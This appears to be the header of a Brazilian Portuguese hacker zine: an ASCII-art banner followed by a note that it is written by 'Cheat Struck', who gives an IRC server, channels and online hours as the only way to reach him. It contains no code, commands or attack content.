NNN NNN FFFF IIII NNN NNN NNN FFFF IIII NNN NNNNNN FFFF IIII NNN NNNNN FFFF IIII NNN NNNN $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Este zine é escrito por Cheat Struck. No e-mail; No page; No ICQ; No IP fixed; A unica maneira de me acharem na inet é: server irc.via-rs.com.br:6667 canal #via-rs #hackers #senhas Quando Sextas e Sabados(raramente) das 12:00 as 6:00